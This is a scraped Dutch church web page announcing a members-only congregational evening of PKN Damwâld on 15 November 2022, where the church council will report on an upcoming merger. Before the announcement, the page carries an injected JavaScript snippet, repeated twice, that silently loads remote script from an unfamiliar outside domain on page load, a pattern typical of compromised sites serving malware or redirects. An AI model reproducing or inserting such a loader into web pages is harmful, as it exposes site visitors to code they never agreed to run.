;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Gemeenteavond Gereformeerd Damwâld - PKN Damwâld
15 november 2022
19:30 t/m 22:00
de Ontmoeting
Gemeenteavond Gereformeerd DamwâldAlleen voor leden van Gereformeerd Damwâld

Gemeenteavond 15 november 2022

De kerkenraad nodigt u van harte uit voor de gemeenteavond die gehouden zal worden op dinsdag 15 november 2022, 19.30 uur in de Ontmoeting. Wij als kerkenraad vinden het fijn als er veel gemeenteleden aanwezig zijn op een gemeentevergadering, omdat het verbondenheid uitstraalt en omdat we dan het gevoel hebben dat gemeenteleden met ons mee willen denken. We staan er als kerkenraad niet alleen voor, gemeente-zijn en de koers die we willen varen is een zaak van ons allemaal. Daarnaast vinden we het belangrijk om elkaar in geloof te ontmoeten. Ook daar willen we op deze avond mee bezig zijn.

De kerkenraad is op dit moment druk bezig met o.a. de komende fusie en uiteraard alle andere kerkenraadszaken. We willen u graag een beeld schetsen van de voortgang ervan. De definitieve agenda voor de gemeenteavond kunt u lezen in de Paadwizer  en/of Tsjerkelûd in november, maar de datum kunt u alvast noteren. Wees welkom!

Locatie: de OntmoetingFoarwei 38, 9104 BX Damwâld